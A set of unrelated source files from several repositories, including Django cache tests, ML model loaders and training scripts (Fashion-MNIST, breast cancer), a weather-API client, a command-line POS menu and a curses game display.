self.assertEqual(obj2.unique_field, 'obj2_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together4_field1=models.SubModel.objects.get(pk=1),
unique_together4_field2=models.SubModel.objects.get(pk=2)
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 2)
self.assertEqual(obj.unique_field, 'obj2_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together4_field1=2,
unique_together4_field2='sub3_unique_field'
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_unique_togethers(self):
dict_keys_list = list()
def _check(_objs, _dict_keys_list):
self.assertIsInstance(_objs, dict)
self.assertEqual(len(_dict_keys_list), 2)
self.assertEqual(_objs[_dict_keys_list[0]].pk, 1)
self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(_objs[_dict_keys_list[1]].pk, 2)
self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field')
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together1_field1=('obj1_unique_together1_field1', 'obj2_unique_together1_field1'),
unique_together1_field2=('obj1_unique_together1_field2', 'obj2_unique_together1_field2'),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together2_field1=('obj1_unique_together2_field1', 'obj2_unique_together2_field1'),
unique_together2_field2=('obj1_unique_together2_field2', 'obj2_unique_together2_field2'),
unique_together2_field3=('obj1_unique_together2_field3', 'obj2_unique_together2_field3'),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together3_field1=('obj1_unique_together3_field1', 'obj2_unique_together3_field1'),
unique_together3_field2=(132, 232),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together4_field1=(models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=1)),
unique_together4_field2=(models.SubModel.objects.get(pk=3), models.SubModel.objects.get(pk=2)),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together4_field1_id=(2, models.SubModel.objects.get(pk=1)),
unique_together4_field2_id=('sub3_unique_field', models.SubModel.objects.get(pk=2)),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
def test_get_objs_from_cache(self):
dict_keys_list = list()
def _check(_objs, _dict_keys_list):
self.assertIsInstance(_objs, dict)
self.assertEqual(len(_dict_keys_list), 2)
self.assertEqual(_objs[_dict_keys_list[0]].pk, 1)
self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(_objs[_dict_keys_list[1]].pk, 2)
self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field')
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together1_field1', 'unique_together1_field2'),
field_values=[
('obj1_unique_together1_field1', 'obj1_unique_together1_field2'),
('obj2_unique_together1_field1', 'obj2_unique_together1_field2'),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together2_field1', 'unique_together2_field2', 'unique_together2_field3'),
field_values=[
('obj1_unique_together2_field1', 'obj1_unique_together2_field2', 'obj1_unique_together2_field3'),
('obj2_unique_together2_field1', 'obj2_unique_together2_field2', 'obj2_unique_together2_field3'),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together3_field1', 'unique_together3_field2'),
field_values=[
('obj1_unique_together3_field1', 132),
('obj2_unique_together3_field1', 232),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together4_field1', 'unique_together4_field2'),
field_values=[
(models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=3)),
(models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together4_field1_id', 'unique_together4_field2_id'),
field_values=[
(2, 'sub3_unique_field'),
(models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
def test_flush_cache(self):
from django.core.cache import cache
from django.db import connection
connection.force_debug_cursor = True
real_obj = models.TestModel.objects.get(pk=1)
sub_obj = models.SubModel.objects.get(pk=2)
def _get_from_cache():
models.TestModel.get_obj_by_pk_from_cache(1)
models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field')
models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1)
models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=sub_obj)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together2_field1="obj1_unique_together2_field1",
unique_together2_field2="obj1_unique_together2_field2",
unique_together2_field3="obj1_unique_together2_field3"
)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132
)
cache.clear()
connection.queries_log.clear()
_get_from_cache()
queries1 = connection.queries
self.assertTrue(queries1)
connection.queries_log.clear()
_get_from_cache()
self.assertFalse(connection.queries)
real_obj.flush_cache()
connection.queries_log.clear()
_get_from_cache()
queries2 = connection.queries
def _get_sqls(queries):
return list(map(lambda x: x['sql'], queries))
self.assertEqual(_get_sqls(queries1), _get_sqls(queries2))
``` |
{
"source": "007gzs/oface",
"score": 2
} |
#### File: oface/model/base.py
```python
from __future__ import absolute_import, unicode_literals
import onnxruntime
class ONNXModel:
def __init__(self, model_file=None, session=None, task_name=''):
self.model_file = model_file
self.session = session
self.task_name = task_name
if self.session is None:
assert self.model_file is not None
self.session = onnxruntime.InferenceSession(self.model_file, None)
``` |
{
"source": "007gzs/xface",
"score": 2
} |
#### File: xface/core/utils.py
```python
from __future__ import absolute_import, unicode_literals
# it's a approximate map
# 15 --> (99+103)/2
# 17, 19; 20, 22; 16; 9 will be used in face crop(25 points)
lms25_2_lms106 = {1: 105, 2: 106, 3: 34, 4: 38, 5: 43,
6: 47, 7: 52, 8: 55, 9: 88, 10: 94,
11: 85, 12: 91, 13: 63, 14: 59, 15: 99,
16: 61, 17: 71, 18: 73, 19: 67, 20: 80,
21: 82, 22: 76, 23: 36, 24: 45, 25: 17}
# 1: left eye center
# 2: right eye center
# 3: nose tip
# 4: left mouth corner
# 5: right mouth corner
lms5_2_lms25 = {1: 1, 2: 2, 3: 8, 4: 11, 5: 12}
lms5_2_lms106 = {1: 105, 2: 106, 3: 55, 4: 85, 5: 91}
def lms106_2_lms25(lms_106):
lms25 = []
for cur_point_index in range(25):
cur_point_id = cur_point_index + 1
point_id_106 = lms25_2_lms106[cur_point_id]
cur_point_index_106 = point_id_106 - 1
cur_point_x = lms_106[cur_point_index_106 * 2]
cur_point_y = lms_106[cur_point_index_106 * 2 + 1]
lms25.append(cur_point_x)
lms25.append(cur_point_y)
return lms25
def lms106_2_lms5(lms_106):
lms5 = []
for cur_point_index in range(5):
cur_point_id = cur_point_index + 1
point_id_106 = lms5_2_lms106[cur_point_id]
cur_point_index_106 = point_id_106 - 1
cur_point_x = lms_106[cur_point_index_106 * 2]
cur_point_y = lms_106[cur_point_index_106 * 2 + 1]
lms5.append(cur_point_x)
lms5.append(cur_point_y)
return lms5
def lms25_2_lms5(lms_25):
lms5 = []
for cur_point_index in range(5):
cur_point_id = cur_point_index + 1
point_id_25 = lms5_2_lms25[cur_point_id]
cur_point_index_25 = point_id_25 - 1
cur_point_x = lms_25[cur_point_index_25 * 2]
cur_point_y = lms_25[cur_point_index_25 * 2 + 1]
lms5.append(cur_point_x)
lms5.append(cur_point_y)
return lms5
```
#### File: xface/model/base.py
```python
from __future__ import absolute_import, unicode_literals
import json
import os
import sys
import torch
class Config(dict):
def __getattr__(self, key):
if key in self:
return self[key]
return None
def __setattr__(self, key, value):
self[key] = value
class Base:
def __init__(self, model_path, model_category, model_name, meta_file='model_meta.json'):
model_root_dir = os.path.join(model_path, model_category, model_name)
meta_file_path = os.path.join(model_root_dir, meta_file)
with open(meta_file_path, 'r') as f:
self.meta_conf = json.load(f)
model_root = os.path.dirname(model_path)
if model_root not in sys.path:
sys.path.append(model_root)
self.model_path = model_path
self.model_category = model_category
self.model_name = model_name
self.model_file_path = os.path.join(model_root_dir, self.meta_conf['model_file'])
self.model_type = self.meta_conf['model_type']
self.model_info = self.meta_conf['model_info']
self.release_date = self.meta_conf['release_date']
self.input_height = self.meta_conf['input_height']
self.input_width = self.meta_conf['input_width']
self.device = None
self.model = None
def load(self, device=None):
assert self.model is None
if device is None:
if torch.cuda.is_available():
device = "cuda:%d" % torch.cuda.current_device()
else:
device = "cpu"
self.device = torch.device(device)
self.model = torch.load(self.model_file_path, map_location=self.device)
self.model.eval()
``` |
{
"source": "007HarshChaudhary/Deep-Learning",
"score": 2
} |
#### File: 007HarshChaudhary/Deep-Learning/Fashion_MNIST.py
```python
import torch
from torch import optim, nn
import torch.nn.functional as F
from torchvision import datasets, transforms
import helper
import time
import matplotlib.pyplot as plt
import numpy as np
from torch.utils.data.sampler import SubsetRandomSampler
transform = transforms.Compose([transforms.ToTensor()])
trainset = datasets.FashionMNIST('Fashion_MNIST', train=True, download=True, transform=transform)
valid_size = 0.2
num_train = len(trainset)
indices = list(range(num_train))
np.random.shuffle(indices)
split = int(valid_size*num_train)
train_idx, valid_idx = indices[split: ], indices[ :split]
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=64, sampler=train_sampler)
valid_loader = torch.utils.data.DataLoader(trainset, batch_size=64, sampler=valid_sampler)
testset = datasets.FashionMNIST('Fashion_MNIST', train=False, download=True, transform=transform)
test_loader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)
class Network(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(784, 356)
self.batchnorm1 = nn.BatchNorm1d(356)
self.fc2 = nn.Linear(356, 124)
self.batchnorm2 = nn.BatchNorm1d(124)
self.fc3 = nn.Linear(124, 64)
self.batchnorm3 = nn.BatchNorm1d(64)
self.fc4 = nn.Linear(64, 10)
self.dropout = nn.Dropout(0.2)
def forward(self, x):
x = x.view(-1, 784)
x = self.dropout(F.relu(self.batchnorm1(self.fc1(x))))
x = self.dropout(F.relu(self.batchnorm2(self.fc2(x))))
x = self.dropout(F.relu(self.batchnorm3(self.fc3(x))))
x = F.log_softmax(self.fc4(x), dim=1)
return x
model = Network()
model.cuda()
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)
start = time.time()
epochs = 30
train_losses=[]
valid_losses=[]
min_validation_loss = np.Inf
for e in range(epochs):
running_loss = 0
model.train()
for images, labels in train_loader:
images = images.cuda()
labels = labels.cuda()
output = model(images)
loss = criterion(output, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
valid_loss = 0
validation_accuracy = 0
model.eval()
with torch.no_grad():
for images, labels in valid_loader:
images = images.cuda()
labels = labels.cuda()
output = model(images)
valid_loss += criterion(output, labels)
ps = torch.exp(output)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class==labels.view(*top_class.shape)
validation_accuracy += torch.mean(equals.type(torch.FloatTensor))
valid_loss /= len(valid_loader)
running_loss = running_loss/len(train_loader)
valid_losses.append(valid_loss)
train_losses.append(running_loss)
print("Epoch: {}/{} ".format(e+1, epochs),
"Training Loss: {:.3f} ".format(running_loss),
"Validation Loss: {:.3f} ".format(valid_loss),
"Validation Accuracy: {:.3f}".format(validation_accuracy/len(valid_loader)))
if valid_loss < min_validation_loss:
print('Validation loss decreased {:.4f}--->{:.4f} saving model'.format(min_validation_loss, valid_loss))
min_validation_loss = valid_loss
torch.save(model.state_dict(), 'FasionMNIST.pt')
print()
print("Total time to train {}".format(time.time()-start))
# model.cpu()
# images, labels = next(iter(test_loader))
# output = model(images[0])
# helper.view_classify(images[0], torch.exp(output), version='Fashion')
plt.plot(train_losses, label='training loss')
plt.plot(valid_losses, label='validation loss')
plt.legend(frameon=False)
model.load_state_dict(torch.load('FasionMNIST.pt'))
test_loss = 0.0
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for evaluation
with torch.no_grad():
for data, target in test_loader:
# forward pass: compute predicted outputs by passing inputs to the model
data=data.cuda()
target=target.cuda()
output = model(data)
# calculate the loss
loss = criterion(output, target)
# update test loss
test_loss += loss.item()
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
# calculate and print avg test loss
test_loss = test_loss/len(test_loader)
print('Test Loss: {:.6f}\n'.format(test_loss))
for i in range(10):
if class_total[i] > 0:
print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (
str(i), 100 * class_correct[i] / class_total[i],
np.sum(class_correct[i]), np.sum(class_total[i])))
else:
print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))
print('\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (
100. * np.sum(class_correct) / np.sum(class_total),
np.sum(class_correct), np.sum(class_total)))
``` |
{
"source": "007mathur/BreastCancerClassification",
"score": 3
} |
#### File: 007mathur/BreastCancerClassification/cancer_pso.py
```python
from nn import relu, sigmoid, tanh, softmax
from nn.model import Model
from nn.layers import Layer
from nn.losses import CrossEntropyLoss, BinaryCrossEntropyLoss
from nn.pipeline import DataLoader
import numpy as np
import pandas as pd
import time
t = time.process_time()
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
df_cancer = pd.DataFrame(np.c_[cancer['data'], cancer['target']], columns = np.append(cancer['feature_names'], ['target']))
all_data = df_cancer.values
scaler.fit(all_data)
np.random.shuffle(all_data)
split = int(0.9 * all_data.shape[0])
x_train = all_data[:split, 0:-1]
x_test = all_data[split:, 0:-1]
y_train = all_data[:split, -1]
y_test = all_data[split:, -1]
def one_hot(y, depth=10):
y_1hot = np.zeros((y.shape[0], depth))
y_1hot[np.arange(y.shape[0]), y] = 1
return y_1hot
y_train = one_hot(y_train.astype('int'), depth=2)
y_test = one_hot(y_test.astype('int'), depth=2)
def accuracy(y, y_hat):
y = np.argmax(y, axis=1)
y_hat = np.argmax(y_hat, axis=1)
return np.mean(y==y_hat)
model = Model()
model.add_layer(Layer(30, 7, relu)))
model.add_layer(Layer(7, 2, softmax))
model.compile(CrossEntropyLoss, DataLoader, accuracy, batches_per_epoch=(x_train.shape[0]//16)+1, n_workers=12)
model.fit(X=x_train, y=y_train, epochs=100)
y_hat = model.predict(x_test)
print('Accuracy on test:', accuracy(y_test, y_hat))
elaped_time = time.process_time() - t
print("Elapsed Time:", elaped_time)
``` |
{
"source": "007rohitSaini/commandline_pos",
"score": 3
} |
#### File: 007rohitSaini/commandline_pos/manager.py
```python
import connect
import getpass # getpass is already included in base python module ,so no need to install it thorugh pip
def main():
# print menu
help = '''
Enter Signup to create new login account.
Enter ShowStock to Show stock database.
Enter ShowLogin to Display Login credentials.
Enter update to edit stock table.
Enter sale to show Sale Table.
Enter Help to see this tect again.
'''
print(help)
# get continous input while true
while True:
init = input(':-> ')
if init.lower() == 'signup':
connect.sign()
elif init.lower() == 'showstock':
connect.show_db()
elif init.lower() == 'showlogin':
connect.show_login()
elif init.lower() == 'sale':
connect.show_sale()
elif init.lower() == 'update':
connect.update_Stock()
elif init.lower() == 'help':
print(help)
elif init.lower() == 'close':
break
else:
print('Input error, Try again')
if __name__ == '__main__':
main()
``` |
{
"source": "007root/weather",
"score": 3
} |
#### File: 007root/weather/weather_api.py
```python
import csv
import requests
from datetime import datetime
TOKEN = ''
CITY_CSV = 'city.csv'
SKYCON = {
"CLEAR_DAY": "晴天",
"CLEAR_NIGHT": "晴夜",
"PARTLY_CLOUDY_DAY": "多云",
"PARTLY_CLOUDY_NIGHT": "多云",
"CLOUDY": "阴",
"RAIN": "雨",
"SNOW": "雪",
"WIND": "风",
"HAZE": "雾霾沙尘"}
WIND_SPEED = {
0: ["1", "无风", "烟直上"],
1: ["1-5", "软风", "烟稍斜"],
2: ["6-11", "轻风", "树叶响"],
3: ["12-19", "微风", "树枝晃"],
4: ["20-28", "和风", "灰尘起"],
5: ["29-38", "清风", "水起波"],
6: ["39-49", "强风", "大树摇"],
7: ["50-61", "劲风", "步难行"],
8: ["62-74", "大风", "树枝折"],
9: ["75-88", "烈风", "烟囱毁"]}
def get_location(province, city=None, zone=None):
with open(CITY_CSV, 'r') as csvfile:
cityread = csv.reader(csvfile)
flag = 0
ret = None
for i in cityread:
if province in i[0]:
flag += 1
if flag == 1:
ret = i
if city and city in i[1]:
if zone:
if zone in i[2]:
ret = i
else:
continue
else:
ret = i
else:
continue
assert ret, "Not found %s. Please enter again" % province
return ret
def get_wind_speed(speed):
if speed <= 1:
return WIND_SPEED.get(0)
else:
WIND_SPEED.pop(0)
for k,v in WIND_SPEED.items():
start, end = v[0].split('-')
if int(start) <= int(speed) <= int(end):
v.insert(0,k)
return v
def get_realtime_weather(province, city=None, zone=None):
"""
get_weather(province, city=None, zone=None)
"""
LOCATION = get_location(province, city, zone)
coordinate = ','.join(LOCATION[-2:])
API = 'https://api.caiyunapp.com/v2/%s/%s/realtime.json?unit=metric:v2' % (TOKEN, coordinate)
weather = requests.get(API)
weather = weather.json()
server_time = float(weather.get('server_time'))
server_time = datetime.fromtimestamp(server_time)
speed = weather.get('result').get('wind').get('speed')
skycon = SKYCON.get(weather.get('result').get('skycon'))
temperature = weather.get('result').get('temperature')
ultraviolet = weather.get('result').get('ultraviolet').get('desc')
region = LOCATION[:2]
speed_msg = get_wind_speed(speed)
result = """
%s
北京时间: %s
当前天气: %s
紫外线 : %s
当前气温: %s℃
当前风速: %skm/h, %s级, %s""" % (','.join(region), server_time, skycon,
ultraviolet, temperature,
speed, speed_msg[0],
','.join(speed_msg[-2:]))
return result
def get_forecast_weather(province, city=None, zone=None):
"""
get_weather(province, city=None, zone=None)
"""
LOCATION = get_location(province, city, zone)
coordinate = ','.join(LOCATION[-2:])
API = 'https://api.caiyunapp.com/v2/G4GV25ceb9iD9g0P/%s/forecast.json?unit=metric:v2' % coordinate
weather = requests.get(API)
weather = weather.json()
server_time = float(weather.get('server_time'))
server_time = datetime.fromtimestamp(server_time)
daily = weather.get('result').get('daily')
speed = daily.get('wind')[0].get('avg').get('speed')
skycon = SKYCON.get(daily.get('skycon')[0].get('value'))
temperature = daily.get('temperature')[0]
temp_avg = temperature.get('avg')
temp_min = temperature.get('min')
temp_max = temperature.get('max')
ultraviolet = daily.get('ultraviolet')[0].get('desc')
pm25 = daily.get('pm25')[0].get('max')
sun = daily.get('astro')[0]
sun_set = sun.get('sunset').get('time')
sun_rise = sun.get('sunrise').get('time')
region = LOCATION[:2]
speed_msg = get_wind_speed(speed)
result = """北京时间: %s
%s
明天天气概况
日出: %s
日落: %s
天气: %s
pm2.5 : %s
紫外线 : %s
气温: 最高 %s℃ 最低 %s℃ 平均 %s℃
风速: %skm/h, %s级, %s""" % (server_time, ','.join(region), sun_rise, sun_set, skycon, pm25,
ultraviolet, temp_max, temp_min, temp_avg,
speed, speed_msg[0],
','.join(speed_msg[-2:]))
return result
if __name__ == '__main__':
the_weather = get_realtime_weather('北京', '朝阳')
print(the_weather)
``` |
{
"source": "007sya/Project2021",
"score": 3
} |
#### File: utils/download_data/datasets.py
```python
import os
from typing import List
import pandas as pd
from utils.download_data import data_dtypes as dtypes
from utils.download_data import download_safegraph_data
from utils.file_utils import file_type
from utils.path_utils import path_utils, paths
def get_brand_info_dataset():
for f in path_utils.list_files_recursively(paths.brand_info):
df = pd.read_csv(f)
return df
def get_core_poi_by_city(city, region=None, save_data=True):
file_name = os.path.join(paths.processed_datasets,
city,
"core_poi.csv")
if os.path.isfile(file_name):
return pd.read_csv(file_name, encoding="utf-8")
chunks = []
for f in path_utils.list_files_recursively(paths.core_poi):
for chunk in pd.read_csv(f, chunksize=10_000):
city = "Houston"
region = "TX"
chunk = chunk[chunk["city"] == city]
if region != None:
chunk = chunk[chunk["region"] == region]
chunks.append(chunk)
final_df = pd.concat(chunks)
if save_data:
path_utils.create_dir_if_necessary(file_name)
final_df.to_csv(file_name, encoding="utf-8", index=False)
return final_df
def filter_census_df(path: str, columns: List[str], cbgs: List[str]):
""" Filters census .csv given the columns and the cbgs
"""
dfs = []
# read the file per parts because it is 1gb large
for chunk in pd.read_csv(path,
encoding="utf-8",
chunksize=10000,
dtype=dtypes.census_dtypes):
chunk["census_block_group"] = (chunk["census_block_group"]
.astype(int).astype(str))
chunk = chunk[chunk["census_block_group"].isin(cbgs)]
chunk = chunk[columns]
dfs.append(chunk.copy())
# concat the filtered chunks
return pd.concat(dfs)
def get_census_metadata():
files = [f for f in path_utils.list_files_recursively(paths.open_census_dir)
if file_type.is_census_metadata(f)]
for file in files:
if "description" in file:
break
return pd.read_csv(file)
def get_lastest_home_pannel_summary(cbgs=None, donwload_most_recent=True):
if donwload_most_recent:
path = download_safegraph_data.download_lastest_home_pannel_summary()
if cbgs is not None:
return filter_census_df(path, ["census_block_group",
"number_devices_residing"],
cbgs)
return pd.read_csv(path, encoding="utf-8")
# %%
```
#### File: utils/list_utils/list_utils.py
```python
from utils.path_utils import path_utils
def listify(list_or_value):
""" Given a list or a value transforms it to a list
Arguments:
list_or_value (str or list): List or a value
Returns:
A list
"""
if isinstance(list_or_value, list):
return list_or_value
else:
return [list_or_value]
def unlistify(list_:list):
""" Given a list it returns the list or the value if the length is 1
Arguments:
list_ (list): List of values
Returns:
A list if the length is greater than 1 if not
returns the first element
"""
if len(list_) == 1:
return list_[0]
else:
return list_
``` |
{
"source": "007vasy/JDP-WordCount",
"score": 4
} |
#### File: 007vasy/JDP-WordCount/word_freq.py
```python
import os
import sys
import re
from docopt import docopt
def openFileAndReadIn(fileName):
text = ""
try:
f = open(fileName, 'r')
except IOError:
print("ERROR Could not read file:{}".format(fileName))
sys.exit()
with f:
text = f.read()
f.close()
return text
def cleanTextAndMakeAList(text):
text = re.sub('[^a-zA-Z]+', ' ', text)
text = text.lower()
return text.split()
def countWordsFreqAndReturnListOfTuples(list_of_words):
freq_counter = {}
for w in list_of_words:
if w not in freq_counter:
freq_counter[w] = 1;
else:
freq_counter[w] += 1
freq_of_words = []
for key,val in freq_counter.items():
freq_of_words.append((val,key))
return freq_of_words
def filterListOfWords(freq_of_words,count_threshold,stop_words):
temp_list = []
if count_threshold != None:
for (val, key) in freq_of_words:
if val > count_threshold and key not in stop_words :
temp_list.append((val,key))
else:
temp_list = freq_of_words
return temp_list
def printOutWordFreqResult(filtered_freq_of_words):
print("----")
filtered_freq_of_words.sort(reverse=True)
for (val, key) in filtered_freq_of_words:
print('{}:{}'.format(key,val))
print("----")
return
def filePathFeedback(file_path):
return("{} is the choosen file path".format(file_path))
def minCountFeedback(count_threshold):
return("_{}_ is the threshold (Anything equal or less will be hidden)".format(count_threshold))
def excludedWordsFeedback(stop_words_file):
return("{} is the file containing the excluded words".format(stop_words_file))
if __name__ == '__main__':
print("####")
arguments = docopt(__doc__, version='1.0')
if arguments['<file_path>']:
analysis_f_name = arguments['<file_path>']
print(filePathFeedback(analysis_f_name))
analysed_text = openFileAndReadIn(analysis_f_name)
count_threshold = None
stop_words_file = ""
stop_words = []
if arguments['<count_threshold>']:
count_threshold = int(arguments['<count_threshold>'])
print(minCountFeedback(count_threshold))
if arguments['<stop_words_file>']:
stop_words_file = arguments['<stop_words_file>']
print(excludedWordsFeedback(stop_words_file))
stop_words = openFileAndReadIn(stop_words_file).split()
list_of_words = cleanTextAndMakeAList(analysed_text)
freq_of_words = countWordsFreqAndReturnListOfTuples(list_of_words)
filtered_freq_of_words = filterListOfWords(freq_of_words,count_threshold,stop_words)
printOutWordFreqResult(filtered_freq_of_words)
else:
print(arguments)
print("####")
``` |
{
"source": "007xuyang/Myblog",
"score": 2
} |
#### File: Myblog/blog/models.py
```python
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Tag(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '标签'
verbose_name_plural = '标签'
name = models.CharField(max_length=40)
def __str__(self):
return self.name
class Category(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '分类目录'
verbose_name_plural = '分类目录'
name = models.CharField(max_length=40)
def __str__(self):
return self.name
class Post(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '文章'
verbose_name_plural = '文章'
# 作者
author = models.ForeignKey(User)
# 标题
title = models.CharField(max_length=200)
# 正文
text = models.TextField()
# 标签
tags = models.ManyToManyField(Tag)
# 分类目录
category = models.ForeignKey(Category)
# 点击量
click = models.IntegerField(default=0)
# 创建时间
created_date = models.DateTimeField(default=timezone.now)
# 发布时间
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
class Comment(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '评论'
verbose_name_plural = '评论'
author = models.CharField(max_length=20)
email = models.EmailField()
text = models.TextField()
created_date = models.DateTimeField(default=timezone.now)
post = models.ForeignKey(Post)
def __str__(self):
return '{0}: {1}'.format(self.author, self.post.title)
class Evaluate(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '评分'
verbose_name_plural = '评分'
ip = models.CharField(max_length=40)
evaluate = models.IntegerField()
post = models.ForeignKey(Post)
def __str__(self):
return '{0}: {1}'.format(self.ip, self.evaluate)
class Page(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '页面'
verbose_name_plural = '页面'
# 作者
author = models.ForeignKey(User)
# 标题
title = models.CharField(max_length=200)
# 正文
text = models.TextField()
# 排列顺序
porder = models.IntegerField(default=0)
# 创建时间
created_date = models.DateTimeField(default=timezone.now)
# 发布时间
published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
``` |
{
"source": "00-ab/willows",
"score": 4
} |
#### File: willows/display/dd_curses.py
```python
import curses
import json
import pprint
TABLE_SYM_ONE = "I"
TABLE_SYM_TWO = "*"
TABLE_WIDTH = 41
TABLE_HEIGHT = 9
TABLE_COL_ONE = 20
def display( game ):
"""
Accepts a dance-game JSON object
and passes it through the wrapper to _display,
which does the real drawing.
"""
game = curses.wrapper( _display, game )
return game
def _display( win, game0 ):
stdscr = win
game_data = json.loads( game0 )
curses.init_pair( 1, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 2, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 3, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 4, curses.COLOR_RED, curses.COLOR_BLACK )
choice = None
while( choice != 'q' ):
_print_stats( stdscr, 1, 1, "PLAYER ONE", game_data['0'] )
_print_stats( stdscr, 1, 51, "PLAYER TWO", game_data['1'])
# insert map display here
strng = "Turn " + str(game_data['game']['turn']) + ". Press any key."
win.addstr( curses.LINES-1, 1, strng )
win.getch()
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
# Get inputs
win.addstr( curses.LINES-1, 1, "Player Zero, input move. " )
choice = chr( win.getch() )
game_data["0choice"] = choice
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
win.addstr( curses.LINES-1, 1, "Player One, input move. " )
choice = chr( win.getch() )
game_data["1choice"] = choice
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
game1 = json.dumps( game_data )
return game1
def _print_stats( win, y, x, title, player ):
d = json.dumps( player )
win.addstr( y, x+1, title )
# Draw the border of the dable
win.vline( y+1, x, TABLE_SYM_TWO, TABLE_HEIGHT )
win.vline( y+1, x+TABLE_COL_ONE, TABLE_SYM_TWO, TABLE_HEIGHT )
win.vline( y+1, x-1+TABLE_WIDTH, TABLE_SYM_TWO, TABLE_HEIGHT )
win.hline( y+1, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+3, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+5, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+7, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+9, x, TABLE_SYM_ONE, TABLE_WIDTH )
# Print the information
win.addstr( y+2, x+2, 'EARTH/WILL' )
win.addstr( y+4, x+2, 'AIR/CALM' )
win.addstr( y+6, x+2, 'FIRE/PASSION' )
win.addstr( y+8, x+2, 'WATER/BALANCE' )
strng = "{0}/{1}".format(player['earth'], player['will'] )
win.addstr( y+2, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['air'], player['calm'] )
win.addstr( y+4, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['fire'], player['heat'] )
win.addstr( y+6, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['water'], player['balance'] )
